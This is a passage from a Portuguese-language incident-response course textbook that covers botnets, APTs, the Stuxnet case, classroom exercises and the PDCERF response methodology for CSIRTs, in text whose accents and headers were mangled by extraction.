simples erros de configurao a, at mesmo, ataques complexos que permitem o roubo
de sesses do usurio. Anualmente disponibilizada uma lista das principais vulnerabili-
dades encontradas em aplicaes web.
Bots e Botnets
q So malwares que permitem que o sistema comprometido seja controlado remotamente
atravs de uma estrutura de administrao. Assim que o malware executado, esta-
belecido um canal de comunicao com o controlador da rede (botmaster). O canal de
comunicao entre o botmaster e o sistema comprometido pode ser implementado de
diferentes formas, valendo-se de diferentes tecnologias:
1 Protocolo Internet Relay Chat (IRC);
1 Protocolo HTTP;
1 Tneis com protocolos cifrados;
1 Protocolo P2P.
Uma vez que a comunicao com a entidade de administrao seja estabelecida com
sucesso, o sistema comprometido torna-se apto a receber comandos e instrues do contro-
lador da rede. Invariavelmente, o malware (bot) apresenta um conjunto de funcionalidades
pr-programadas que podem ser invocadas remotamente pelo botmaster.
Essa lista mantida
pela organizao Open
Web Application
Security Project
(OWASP), que tem
como objetivo
aprimorar a segurana
de softwares: https://
www.owasp.org
w
53

C
a
p

t
u
l
o


3

-

R
i
s
c
o
s

e

a
m
e
a

a
s
As aes desempenhadas pelas botnets, em geral, so danosas estrutura da internet.
q As botnets so responsveis pelas mais diversas atividades maliciosas, tais como:
1 Envio de spam;
1 Varredura ou propagao;
1 Ataques de negao de servios;
1 Distribuio de malwares;
1 Furto de identidade (credenciais de acesso);
1 Furto de dados sensveis (espionagem industrial).
Alm disso, os bots possuem, na maioria dos casos, a opo de atualizao remota. Com
isso, novas funcionalidades podem ser incorporadas aos bots sem a necessidade do contro-
lador da rede ter de comprometer novas mquinas.
q Uma forma de potencializar os ataques das mquinas comprometidas constituir uma
rede de bots, ou seja, uma botnet. Uma botnet nada mais que um conjunto de bots
conectados em uma mesma estrutura administrativa.
Dessa forma, um conjunto de mquinas comprometidas pode ser coordenado de modo a
lanar ataques remotamente.
Outros riscos
Encontrar uma abordagem efetiva para identifcar e proteger a vasta coleo de sistemas
vulnerveis uma luta contnua no contexto da ciberdefesa. Certas tecnologias como
virtualizao, dispositivos mveis e computao em nuvens tendem a fornecer novas
funcionalidades e aprimoramentos aos sistemas computacionais. Por outro lado, cada nova
tecnologia tambm introduz complexidade adicional que pode ser potencialmente explo-
rada e causar prejuzos aos sistemas existentes na instituio.
Algumas instituies simplesmente ignoram ou no classifcam como relevantes as
ameaas introduzidas pelas novas tecnologias. Outras, porm, preferem terceirizar o tra-
tamento dessas novas ameaas utilizando solues de terceiros, mesmo sem ter noo do
nvel de segurana implementado por essas solues de terceiros.
Sabe-se que um processo de identifcao de incidentes deve ser abrangente o sufciente
para lidar com os mais diversos tipos de ameaas. Em etapas iniciais, muitos CSIRTs optam
por ter foco nas ameaas possivelmente mais relevantes para o contexto de sua instituio.
Por outro lado, no se devem esquecer novas ameaas, como as Advanced Persistent Threat
(APT), que em um primeiro momento pode no ser relevante, mas que so latentes.
q Para isso, importante que os membros da equipe criem uma perspectiva de como
reconhecer as novas ameaas e como as estas podem impactar sua organizao.
fundamental:
1 Reconhecer e categorizar novas ameaas;
1 Planejar e estar preparado para responder;
1 Educar e auxiliar outros quando necessrio.
Os ataques sofsticados so lanados por atacantes com alto nvel de especializao tcnica.
Esses atacantes, ou cibercriminosos, geralmente possuem motivaes fnanceiras. Um dos
modelos de negcio altamente lucrativos compreende o roubo de informaes sensveis
de instituies. Sendo assim, os atacantes utilizam ataques coordenados em busca de
54

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
informaes que julgam relevantes, como nmeros de cartes de crdito, contas bancria e
credenciais de acesso contendo informaes que sejam valorveis.
q Atualmente, a defesa ciberntica deve enfrentar grandes desafos, entre os quais:
1 Os atacantes tm aumentado signifcativamente a motivao com ganhos fnanceiros;
1 Empresas criminosas esto competindo por talentos.
Profssionais com alto nvel tcnico e que possuem padres ticos fexveis esto encon-
trando cada vez mais oportunidades em empresas de espionagem. Observam-se, tambm,
a atuao desses profssionais com tica questionvel atuando em empresas de contrainteli-
gncia com o cargo de consultor de segurana.
Nesse contexto, cabe aos profssionais de segurana adaptar e preparar sua organizao de
modo a evitar que ataques sofsticados sejam efetivos. Para isso, necessrio que o CSIRT
no tenha foco apenas em questes tcnicas e operacionais, mas sim na implementao de
uma cultura de segurana em todos os departamentos da instituio.
APT
q O Advanced Persistent Threat (APT) pode ser caracterizado por ataques que utilizam tc-
nicas avanadas para comprometer um alvo especfco. Em geral, as APTs so ameaas
bem especfcas que se destinaram a alvos de grande valor, tal como instalaes
governamentais, empresas de petrleo, companhias de segurana e produtos de alta
tecnologia. A motivao no apenas ter acesso aos sistemas de uma instituio, mas
sim manter o acesso de forma persistente por um longo perodo de tempo. Um exemplo
clssico de APT so casos de ciberespionagem, onde uma empresa busca monitorar
informaes sensveis de um concorrente a fm de obter vantagens comerciais.
Nesses casos mais complexos, os atacantes investem meses para preparar um ataque a um
alvo especfco. Nesse perodo, os detalhes do alvo so estudados e softwares especfcos
so desenvolvidos com a fnalidade de comprometer o alvo. Utilizando diferentes fontes de
informao, possvel adquirir melhores percepes sobre o alvo e utilizar a inteligncia
obtida para lanar mltiplos ataques durante um longo perodo.
q
Uma caracterstica fundamental para as APTs permanecer invisvel durante a operao.
Como tal, os atacantes utilizam tcnicas avanadas, tipicamente atuando em etapas incre-
mentais, movendo a partir de uma mquina comprometida. Dessa forma, busca-se evitar que
assinaturas de trfego sejam identifcadas. Os atacantes empenham massivos esforos para
assegurar que aes maliciosas no possam ser mapeadas pelos administradores legtimos
do sistema comprometido.
q De forma resumida, as APTs tm as seguintes caractersticas:
1 Utilizam ferramentas customizadas e tcnicas de intruso que compreendem o uso
de exploits e rootkits desenvolvidos especifcamente para atacar a instituio-alvo;
1 Permanecem por um longo perodo na instituio-alvo e atuam de forma discreta
para evitar deteco;
1 Implementam aes de espionagem, sabotagem e, geralmente, envolvem funcionali-
dades que ocultam os autores do ataque.
Os ataques lanados a um alvo especfco podem ser compostos com diferentes vetores
de ataques, podendo usar desde tcnicas de engenharia social at o desenvolvimento de
malwares que exploram mltiplas vulnerabilidades desconhecidas (zero-days exploits).
55

C
a
p

t
u
l
o


3

-

R
i
s
c
o
s

e

a
m
e
a

a
s
Os malwares, em especial, so desenvolvidos usando tcnicas avanadas de ofuscao,
o que difculta a sua deteco por parte dos sistemas de antivrus.
q Boa parte dos malwares utilizados em APTs, alm de serem difceis de ser detectados,
implementam tcnicas que permitem a administrao remota dos sistemas compro-
metidos. Atacantes valem-se dessa capacidade de controle remoto de modo a utilizar o
sistema comprometido para:
1 Comprometer novos sistemas;
1 Identifcar alvos importantes;
1 Identifcar a topologia da rede;
1 Ter acesso a informaes crticas.
Se um ataque do tipo APT no conseguir contatar os seus operadores, as informaes e toda
a inteligncia capturada no podem ser transmitidas, o tornando inefetivo. Sendo assim,
so utilizadas diferentes tcnicas para ter acesso aos dados de uma instituio, como por
exemplo: tneis, envio de dados em e-mails, esteganografa, requisies HTTP (POST/GET),
entre outros.
Para pensar
Do ponto de vista operacional, as APTs possuem o funcionamento muito semelhante a
uma botnet. Apesar de usarem diferentes vetores de ataques e funcionalidades espe-
cfcas, as APTs comprometem mquinas internas e estabelecem um canal de controle
e comando de modo a controlar dispositivos e exportar dados da instituio.
Tendo em vista esse conjunto de ameaas sofsticadas, cabe aos CSIRTs adaptarem-se
para atuar e identifcar incidentes de segurana relacionados aos APTs e prover uma
resposta efetiva.
Nos ltimos anos, as ameaas do tipo APTs ganharam muita publicidade. O ataque mais
notvel envolvendo APTs foi o Stuxnet, realizado em 2010. O objetivo do ataque era corromper
o programa nuclear do Ir e, como pde ser observado, foi empregado um grande esforo e
srio investimento.
q O Stuxnet demonstrou como diferentes ameaas podem ser combinadas para sobressair
a mltiplas camadas de segurana. O ataque foi realizado utilizando diferentes etapas.
A primeira etapa do ataque consistia em fazer com que um computador da rede
interna do alvo executasse um arquivo malicioso especialmente desenvolvido para a
operao. Estima-se que foram utilizadas diferentes tcnicas para induzir a execuo
do malware internamente:
1 Tcnicas de engenharia social;
1 Dispositivo USB infectado;
1 E-mail com links maliciosos;
1 Phishing;
1 Sabotagem.
Embora no ofcial-
mente reconhecido,
acredita-se que o
ataque foi planejado
pelos Estados Unidos
em conjunto com Israel.
l
56

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
No se sabe ao certo a tcnica utilizada. De qualquer forma, o malware foi executado com
sucesso em um computador interno da instituio-alvo, sem ser detectado por ferramentas
de segurana. O Stuxnet ento utilizava de algumas vulnerabilidades do tipo zero-day mais
especifcamente quatro vulnerabilidades zero-day para comprometer o sistema e tomar
controle do sistema Windows do computador utilizado. Sabe-se que as vulnerabilidades
zero-day so falhas de segurana geralmente no conhecidas e que ainda no existe correo
disponibilizada para sua remediao. A anlise do malware identifcou que os arquivos foram
construdos unicamente para o ataque em particular, sendo difceis de serem identifcados.
Aps a execuo do malware na rede interna alvo, um conjunto de etapas foi utilizado at
que o objetivo do ataque fosse atingido. A primeira etapa consistia em obter acesso rede
interna da Usina Nuclear Iraniana. Para isso, foram utilizadas as caractersticas do prprio
malware desenvolvido. A partir do momento em que o malware teve acesso aos sistemas
confveis da rede interna, o Stuxnet comeou a coletar informaes e inicializou contato
com servidores de controle e comandos dos atacantes. Com isso, o Stuxnet pde ser atuali-
zado e receber instrues de como proceder com o ataque.
Na etapa seguinte, o malware propagou-se para outros sistemas internos, utilizando mtodos
combinados de ataque. Essa propagao continuou, at que fosse encontrado um sistema
Windows executando um controlador de rede especfco (SCADA) do fabricante Siemens.
Quando encontrado, o Stuxnet utiliza uma senha padro (hardcoded) do software da Siemens
para ter acesso rede de equipamentos gerenciada pelo prprio controlador da Siemens.
A partir desse momento, o Stuxnet usou o controlador da Siemens para localizar disposi-
tivos que gerenciam o funcionamento das centrfugas atmicas da Usina Nuclear Iraniana.
Por fm, esses dispositivos que controlam as centrfugas foram atacados e reprogramados
de modo a afetar o funcionamento. Como consequncia, as centrfugas foram danifcadas,
afetando o processo de enriquecimento de urnio da Usina Iraniana.
O Stuxnet serve como um exemplo para que o CSIRT avalie o plano de resposta adequando
para essas novas ameaas APTs. Sem um plano de resposta devidamente testado, uma
organizao no pode efetivamente detectar e responder o incidente de forma rpida o
sufciente para impedir que demais danos sejam causados.
Leitura recomendada:
1 Viega, John. The Myths of Security: What the Computer Security Industry Doesnt Want
You to Know. OReilly, 2009;
1 Schultz, Eugene, and Russell Shumway. Incident response: a strategic guide to handling
system and network security breaches. Sams, 2001;
1 Radvanovsky, Robert S., and Allan McDougall. Critical infrastructure: homeland security
and emergency preparedness. CRC Press, 2009;
1 Cartilha de Segurana para Internet CERT.br: http://cartilha.cert.br/
1 Sugestes para defesa contra ataques de fora bruta para SSH:
http://www.cert.br/docs/whitepapers/defesa-forca-bruta-ssh/
57

C
a
p

t
u
l
o


3

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

3

Roteiro de Atividades 3
Atividade 3.1 Anlise de riscos
Estime quais seriam as implicaes e consequncias para as atividades comerciais de sua
instituio caso os recursos crticos fossem corrompidos.
a. Servidor de e-mail:
b. Ponto de acesso wireless:
c. Laptop do vice-presidente de marketing:
d. Servidor de banco de dados com dados mdicos:
e. Telefone celular do vice-presidente de inovao da empresa:
Atividade 3.2 Ameaas de segurana
Responda como a sua organizao est atuando com os seguintes ativos sob o ponto
de vista da segurana da informao. Esses ativos ou situaes realmente representam
ameaas de segurana para a sua instituio?
a. Restrio de uso de dispositivos USB (disco externo, USB Wi-f):
58

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
b. Acesso fsico s estruturas do CSIRT/datacenter. Existe restrio de acesso? Qual o pro-
cedimento quando um funcionrio esquece a identifcao de acesso? Visitantes podem
acessar o datacenter usando smartphones/cmeras?
c. Como feita a restrio de acesso rede sem fo da instituio? Como restringir o sinal
da rede sem fo? Visitantes tm acesso mesma rede dos funcionrios?
d. Acesso rede de telefonia 3G/4G:
Atividade 3.3 Comprometimento de sistemas
Alguns dispositivos conectados em redes tambm so passveis de serem comprometidos.
Por exemplo, boa parte das cmeras possui tecnologia IP e podem ser gerenciadas remota-
mente. Discuta os seguintes pontos:
a. Esses sistemas so conectados na mesma rede de produo da instituio ou possuem
algum isolamento (VLAN)?
b. O sistema de gerenciamento terceirizado? Como o seu CSIRT gerencia o controle de
acesso as imagens da cmera? As cmeras poderiam ser utilizadas por terceiros para
identifcar senhas digitadas e visualizar dados da tela dos computadores?
Atividade 3.4 Ataques web
a. Boa parte das instituies possuem sistemas web baseados em PHP, ASP ou CGI. Esses
sistemas tipicamente permitem ao usurio interagir com um banco de dados e tambm
acessar determinados arquivos de um servidor web. Como um administrador de sistemas
pode evitar que ataques a essas aplicaes possam comprometer um servidor web?
59

C
a
p

t
u
l
o


3

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

3

Atividade 3.5 Ataques de fora bruta
Quais so os principais mecanismos utilizados para proteger sistemas de ataques de fora
bruta? Considere os seguintes sistemas:
a. Webmail da instituio:
b. SSH:
Atividade 3.6 Atuando com APTs
As questes a seguir so relativas s Advanced Persistent Threats (APTs).
Responda como essas ameaas podem estar relacionadas com a sua instituio:
a. Sua instituio pode ser considerada como um alvo em potencial para ataques do tipo APT?
b. Existem empresas terceiradas que prestam servios para a sua empresa? As prestadoras
de servios implementam um nvel de segurana que a sua instituio considera acei-
tvel? Essas empresas terceirizadas possuem expertise para lidar com ameaas APT?
c. Quais seriam as consequncias caso sua instituio sofresse um ataque do tipo APT
efetivo (evaso de dados confdenciais e informaes estratgicas)?
d. Uma APT poderia infuenciar de forma direta o valor de uma instituio
(no mercado de aes)?
60

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Atividade 3.7 Ataques de negao de servio (DoS)
Responda como o seu CSIRT abordaria as seguintes situaes, onde um ataque de negao
de servio est em questo:
a. Como lidar como uma ameaa de extorso de ataque DoS?
b. Voc considera um DoS um recurso vlido para o hacktivismo? Um ataque de negao de
servio pode ser considerado um protesto? Qual a sua opinio relativa s pessoas que
cedem o seu computador voluntariamente para realizar ataques DoS?
61

C
a
p

t
u
l
o


4

-

P
r
o
c
e
s
s
o

d
e

t
r
a
t
a
m
e
n
t
o

d
e

i
n
c
i
d
e
n
t
e
s
4
Processo de tratamento
de incidentes
Discutir a importncia de ter um plano de resposta a incidentes de segurana;
Conhecer metodologias para o processo de resposta a incidentes; Entender
os conceitos relacionados ao processo de tratamento de incidentes.
Ameaas e riscos de segurana; Sincronizao e padronizao da data e hora;
Classifcao de incidentes.


Introduo
q O processo de tratamento de incidentes de segurana consiste na implementao de
procedimentos e etapas bem defnidas que conduziro a equipe para a resoluo de um
incidente de segurana. O conjunto de etapas defnidas permite determinar um fuxo
lgico especifcando aes a serem realizadas nas diferentes etapas do processo.
Alm de guiar a equipe para a resoluo de incidentes, a utilizao de procedimentos evita
que a equipe cometa falhas. Isso essencialmente importante, sobretudo na resposta a inci-
dentes, onde consequncias de aes implementadas pela equipe podem afetar a organi-
zao como um todo.
Neste captulo, descrita a importncia de constituir um plano de resposta a incidentes e
ter um processo para atuar com os diversos incidentes de segurana. Para isso, apresen-
tada uma metodologia especfca para a resposta de incidentes de segurana denominada
PDCERF , onde seus aspectos de implementao so discutidos, bem como consideraes
relativas a cada etapa da metodologia. Por fm, o captulo fnalizado com exemplos de
rotinas e procedimentos que podem ser utilizados em um CSIRT.
Para pensar
Emoo um luxo custoso durante a crise. Sem foco e lgica para tomar decises,
um tempo precioso pode ser perdido.
o
b
j
e
t
i
v
o
s
c
o
n
c
e
i
t
o
s
62

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Metodologia para resposta a incidentes
q Metodologia defne um processo a ser executado, ou seja, o conjunto de etapas que
devem ser seguidas para a resoluo de incidentes. Utilizar uma metodologia de res-
posta a incidente no garante o sucesso da operao em si; no entanto, tende a auxiliar
nos seguintes aspectos que margeiam o processo de resposta a incidentes:
1 Estrutura e organizao: geralmente um CSIRT est envolvido com diferentes
incidentes, onde a complexidade, muitas vezes, tende a aumentar com a evoluo da
investigao. Ter uma metodologia defnida garante que os incidentes sejam tratados
de forma estrutura (segundo as etapas) e organizada de forma padronizada;
1 Efcincia: utilizar uma metodologia bem defnida e assertiva para solucionar inci-
dentes impede que aes desnecessrias sejam implementadas;
1 Consideraes legais: alguns incidentes so necessrios colaborao com as foras
da lei. A utilizao de uma metodologia estabelecida pode auxiliar na preservao de
provas e tambm proteger o CSIRT de possveis questionamentos.
No contexto especfco de resposta a incidentes podem ser observadas algumas metodo-
logias descritas pela literatura. Uma das principais metodologias de resposta a incidentes
denominada PDCERF foi defnida pelo Instituto de Engenharia de Software de Pittsburgh,
Pensilvnia, nos Estados Unidos, no ano de 1989.
q A referida metodologia de resposta a incidente especifca diferentes etapas por onde um
incidente deve fuir para que a sua resoluo seja efetivada com sucesso, sendo:
1. Preparao: gerenciar as ferramentas para anlise de incidentes, incluindo o conhe-
cimento de todo o ambiente utilizado;
2. Deteco: detectar o incidente, determinar o escopo e as partes envolvidas com
o incidente;
3. Conteno: conter o incidente de maneira a atenuar os danos e evitar que demais
recursos sejam comprometidos;
4. Erradicao: eliminar as causas do incidente, removendo todos os eventos relacionados;
5. Recuperao: restaurar o sistema ao seu estado normal;
6. Avaliao: avaliar as aes realizadas para resolver o incidente, documentando
detalhes, e discutir lies aprendidas.
3. conteno
2. deteco
1. preparao
4. erradicao
5. recuperao
6. avaliao
resposta a
incidentes
Na sequncia, as diferentes etapas so descritas com mais detalhes, incluindo aes e
tarefas relacionadas a cada etapa. Por questo de organizao, o detalhamento seguir a
mesma ordem exemplifcada na fgura anterior.
Figura 4.1
Metodologia
de resposta a
incidentes de
segurana.
63

C
a
p

t
u
l
o


4

-

P
r
o
c
e
s
s
o

d
e

t
r
a
t
a
m
e
n
t
o

d
e

i
n
c
i
d
e
n
t
e
s
Preparao
A etapa de preparao descreve aspectos que devem ser observados pela equipe do CSIRT antes
mesmo que um incidente de segurana seja identifcado. O objetivo preparar o CSIRT para
atuar prontamente na deteco e resoluo de incidentes de segurana quando ocorrerem.
q Algumas atividades relativas etapa de preparao:
1 Implementar mecanismos de defesa e controle de ameaas;
1 Desenvolver procedimentos para lidar com incidentes de forma efciente;
1 Obter recursos e equipe necessria para lidar com os problemas;
1 Estabelecer infraestrutura de suporte atividade de resposta a incidentes.
Na sequncia, as atividades especfcas de preparao so descritas com mais detalhes:
Mecanismos de defesa e controle de ameaas
Um CSIRT geralmente est inserido na infraestrutura de uma instituio. Mesmo utilizando
uma infraestrutura compartilhada.
q recomendvel que o CSIRT tenha os seus prprios mecanismos de defesa e controle
das ameaas.
Por exemplo, o CSIRT pode ter uma subrede especfca dentro da rede da instituio e, atravs
de mecanismos fltros de acesso e frewall , implementar uma barreira lgica para restringir
o acesso aos seus sistemas. O CSIRT deve estar preparado para ataques externos e tambm
ataques internos infraestrutura em que est inserido.
q Todos os servios providos pelo CSIRT devem ter cuidado redobrado com a segurana.
Afnal, o comprometimento de sistemas do CSIRT um incidente de segurana crtico, pois
tais sistemas contm informaes sensveis da prpria instituio e demais organizaes
envolvidas com incidentes. Os sistemas e aplicaes utilizados no processo de resposta a
incidentes tambm podem sofrer ataques. Logo, cabe equipe do CSIRT gerir os sistemas
e dispositivos utilizados pelo time. Isso signifca que as melhores prticas de confgurao
segura devem ser implementadas pelo administrador de sistemas do CSIRT. O recomendado
alocar recursos sufcientes para efetuar um controle de segurana nos sistemas geren-
ciados sem restringir de maneira rgida sua funcionalidade.
q Algumas medidas bsicas de administrao de sistemas:
1 Poltica de senhas;
1 Analisar regularmente os logs gerados pelas ferramentas utilizadas;
1 Zelar pela integridade dos sistemas;
1 Realizar o backup dos sistemas;
1 Atuao e gerenciamento dos sistemas;
1 Confgurao segura.
Procedimentos para atuar em incidentes
64

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q Como se sabe, os procedimentos podem ser descritos como rotinas operacionais que
visam auxiliar o CSIRT para que uma atividade seja realizada com sucesso.
Dessa maneira, os membros do time podem realizar tarefas de maneira organizada e mais
efciente evitando que erros sejam introduzidos no processo.
Existem diferentes procedimentos que podem ser implementados por um CSIRT, conforme
anteriormente descrito. No contexto especfco da resposta a incidentes, entretanto,
podemos citar procedimentos para desinfeco de uma mquina comprometida; testes de
vulnerabilidades; anlise de arquivos maliciosos; e a investigao de eventos de segurana
em arquivos de logs. Dessa forma, so designadas aes a serem seguidas para cada tipo de
incidente de segurana identifcado.
Incidente Mtodo de deteco Procedimento de resposta
Comprometimento de
um servidor.
Notificao externa: servidor
comprometido est reali-
zando varreduras.
Isolar o servidor comprome-
tido para anlise e notificar os
responsveis.
Desfigurao de
pgina web.
Monitorao de integridade
de arquivos.
Isolar o servidor para anlise.
Indisponibilidade do
site principal.
Monitorao de disponibili-
dade do sistema.
Coordenar com equipe de
suporte e responsveis pela
infraestrutura de rede.
Essa tabela descreve alguns incidentes, mtodos pelos quais os incidentes podem ser detec-
tados pelas instituies e tambm possveis medidas de conteno do incidente. Sabe-se, no
entanto, que os procedimentos so dinmicos e devem ser aprimorados com o tempo e expe-
rincia da equipe. Certos times optam por descrever procedimentos de maneira mais genera-
listas, identifcando aspectos-chave que devem ser observados no decorrer do processo.
Infraestrutura para resposta a incidentes
q A infraestrutura para resposta a incidentes refere-se aos recursos utilizados para dar
suporte ao processo de incidentes como um todo.
Em especial, quando atuando com mltiplos incidentes de segurana, se faz necessrio usar
softwares que permitam gerenciar os incidentes sendo tratados.
Alguns times utilizam ferramentas especializadas no gerenciamento de incidentes, onde
disponibilizada uma plataforma para acompanhar um incidente de segurana. Isso envolve
descrever detalhes do incidente, aes realizadas pelo CSIRT e prover ferramentas para
auxiliar na investigao do incidente identifcado. Por outro lado, alguns CSIRTs desen-
volvem seus prprios sistemas de gerenciamento.
q Entre os sistemas mais conhecidos esto os de trouble ticket. Esses sistemas so pla-
taformas de acompanhamento de atividades, onde servios so requisitados e geren-
ciados de forma centralizada. Boa parte das solues de trouble ticket caracteriza-se por
implementar recursos como:
1 Identifcador nico: permite localizar um incidente na base de dados e tambm ser
referenciado por outros incidentes relacionados;
1 Tipo: descrevem informaes sobre o incidente, tal como: invaso, vrus, comprome-
timento de sistema e outros;
Tabela 4.1
Alguns incidentes
e possveis
procedimentos.
65

C
a
p

t
u
l
o


4

-

P
r
o
c
e
s
s
o

d
e

t
r
a
t
a
m
e
n
t
o

d
e

i
n
c
i
d
e
n
t
e
s
q 1 Prioridade: qual foi a prioridade designada para o incidente;
1 Responsvel: pessoa que est atualmente gerenciando o incidente;
1 Status: o estado atual do incidente incluindo informaes recebidas e demandas
a serem realizadas;
1 ltima atualizao: quando e quem alterou as ltimas informaes sobre o incidente.
Os sistemas de trouble ticket mais completos tambm auxiliam o CSIRT com atividades
operacionais inerentes ao processo de resposta a incidentes. Por exemplo, permitir o uso de
criptografa, suporte a diferentes codifcaes e idiomas (alfabeto chins, japons, polons
ou russo). Da mesma forma, possvel encontrar ferramentas que permitem a exportao
das informaes do sistema em diferentes formatos, em especial, formatos padronizados
para troca de informaes de incidentes como o Incident Object Description and
Exchange Format (IODEF).
q Como exemplo, possvel citar a ferramenta RTIR. Essa ferramenta uma plataforma de
cdigo aberto para gerenciar sistemas de resposta a incidentes tendo como pblico-alvo
CSIRTs. A fgura a seguir ilustra a interface da ferramenta RTIR.
Deteco
O processo de deteco consiste em determinar a natureza do comprometimento,
disponibilizando detalhes dos sistemas comprometidos. A avaliao inicial dos inci-
dentes pode auxiliar na investigao de um incidente de modo a confrmar a existncia
de um comprometimento e tambm das suas consequncias.
q De modo geral, a etapa de deteco deve contemplar:
1 Sistemas e servios afetados: identifcar todos os sistemas e servios afetados
relacionados com o incidente;
1 Impacto e risco: avaliar o impacto do incidente e os potenciais riscos dos sistemas
afetados (dados vazados, informaes de instituies terceiras, impacto na prpria
organizao e impacto na reputao);
1 Eventos correlatos: identifcar a existncia de outros eventos e alertas relacionados
com o incidente em questo;
IODEF
define um formato de
dados para descrever e
intercambiar informa-
es de incidentes de
segurana entre CSIRTs.
Figura 4.2
Interface da
ferramenta RTIR:
http://bestpractical.
com/rtir/Deteco
66

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Mapeamento de dados: identifcar que tipo de informao e processos podem ter
sido afetados;
1 Responsveis: os responsveis pelo sistema comprometido, equipes de suporte e
donos das informaes.
De fato, existem diferentes maneiras de detectar um incidente de segurana. Isso inclui
investigar as notifcaes de incidentes recebidos e tambm identifcar proativamente
eventos de segurana suspeitos.
q Devido sofsticao dos ataques, alguns times fazem o uso de diferentes ferramentas
projetadas especifcamente para detectar eventos de segurana, tal como:
1 Sistemas de deteco de intruso: ferramenta que inspeciona pacotes suspeitos e
conexes baseadas em assinaturas e heursticas pr-defnidas;
1 Filtros de Pacotes: ferramenta para fltrar trfego de rede que permite bloquear ou
permitir um determinado trfego;
1 Sistemas de anlise de malware: avaliar o comportamento de um malware em um
sistema isolado de maneira a mapear um comportamento anmalo;
1 Sistemas de antivrus: avalia assinatura de malwares conhecidos e gera alerta infor-
mando o comprometimento de um sistema;
1 Sistemas de fuxos (sfow): permitem avaliar metadados de conexes de rede geral-
mente implementado em concentradores de rede;
1 Captura de pacotes: dados capturados em uma anlise de uma mquina comprome-
tida (tcpdump) podem revelar caractersticas maliciosas;
1 Fontes externas: fontes pblicas podem fornecer dados valiosos para a identifcao
de incidentes (redes sociais, fruns ou blogs).
Diversas solues comerciais prometem alto nvel de deteco; no entanto, cabe ao CSIRT
coordenar como essas solues so aplicadas na rede e monitorar seus requisitos de segu-
rana. Alm da confgurao e monitorao, muitas solues de segurana requerem cons-
tantes atualizaes. Certas solues de segurana demandam atualizaes de assinaturas,
do prprio Sistema Operacional, de aplicaes, ou ainda do frmware sendo executado. Por
exemplo, uma soluo de antivrus s consideravelmente efetiva com constantes atualiza-
es das assinaturas e do software em si. Todas essas atividades devem ser consideradas e
fazer parte dos esforos do processo de resposta a incidentes.
Sabe-se que no existe uma soluo de segurana pronta, ou seja, sempre neces-
srio customizar os recursos tendo em vista as particularidades da sua rede.
Alguns tipos de incidentes, no entanto, no requerem softwares especializados para serem
detectados. Apenas informaes disponveis nos diferentes sistemas de logs podem identiq-
fcar uma atividade suspeita.
q Na sequncia so descritas atividades suspeitas que podem confgurar um incidente
de segurana:
1 Diversas tentativas de login: certos tipos de ataques utilizam tcnicas de fora
bruta para ter acesso privado a sistemas;
1 Tentativas de acesso a contas de sistemas ou inexistentes: o acesso a essas
contas revelam um comportamento no mnimo suspeito e deve ser investigado;
67

C
a
p

t
u
l
o


4

-

P
r
o
c
e
s
s
o

d
e

t
r
a
t
a
m
e
n
t
o

d
e

i
n
c
i
d
e
n
t
e
s
q 1 Atividades em horrios anormais: alta utilizao da rede ou conexes externas em
horrios no convencionais podem revelar atividades suspeitas;
1 Integridade do sistema: existem algumas ferramentas que verifcam a integridade
de programas de sistemas. Em alguns comprometimentos, comandos legtimos dos
sistemas so substitudos por outros com carga maliciosa (ssh, su ou login);
1 Lacunas nos logs: uma clara indicao que o sistema foi comprometido e certas ati-
vidades foram excludas dos logs para mascarar a presena do atacante no sistema.
Alm de identifcar um incidente de segurana, faz parte da etapa de deteco obter mais
detalhes de um incidente e at mesmo correlacionar eventos de segurana sob um aspecto
mais amplo.
q Isso signifca que o CSIRT pode confgurar seus recursos de modo a obter maior grau de
detalhamento dos eventos envolvidos em um incidente de segurana, tal como:
1 Incrementar o nvel de monitorao de ferramentas de segurana de maneira a obter
mais informaes para serem investigadas;
1 Copiar as informaes do sistema comprometido, incluindo artefatos do invasor e
demais provas. Dessa maneira, no se corre o risco do atacante remover evidncias
que podem ser utilizadas para anlise e em questes legais;
1 Documentar todos os procedimentos realizados, incluindo todas as evidncias de
comprometimento identifcadas pelo investigador. Na etapa de deteco, pequenos
detalhes aparentemente irrelevantes podem ser fundamentais nas etapas poste-
riores de anlise.
Como resultado, aps o processo de identifcao e anlise dos incidentes investigados,
pode-se ter uma viso preliminar do impacto do incidente na instituio. Sabe-se que
estimar o real escopo do incidente permite que a equipe possa direcionar esforos e iden-
tifcar que tipos de incidentes devem ser priorizados. Cada CSIRT implementa sua prpria
poltica de priorizao.
q A seguir, alguns pontos que devem ser considerados no processo de priorizao de
um incidente:
1 A quantidade de computadores e servios que foram afetados pelo incidente detec-
tado. Diferentes mtodos de interveno podem ser empregados dependendo de
quo espraiado est o comprometimento;
1 O nvel de privilgio obtido pelo atacante nos sistemas comprometidos: por exemplo,
se o atacante conseguiu ter acesso a usurios privilegiados (administrador, root) ou
que usurios foram comprometidos;
1 A criticidade dos sistemas comprometidos. Identifcar se algum sistema comprome-
tido pode afetar a operao regular da instituio;
1 Os meios utilizados para o comprometimento dos sistemas, tal como a aplicao
atacada e vulnerabilidade explorada;
1 O nvel de disseminao das informaes sobre o incidente. Muitas vezes a propa-
gao de informaes sobre um incidente pode repercutir negativamente com os
clientes ou parceiros da instituio afetada.
Invariavelmente, quando um incidente de segurana detectado, existe a necessidade de
interagir com as partes envolvidas. Nesse processo, a comunicao em si crtica. Torna-se
necessrio identifcar fatores-chave e fatores essencialmente necessrios, que devem ser
informados para as partes envolvidas.
68

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
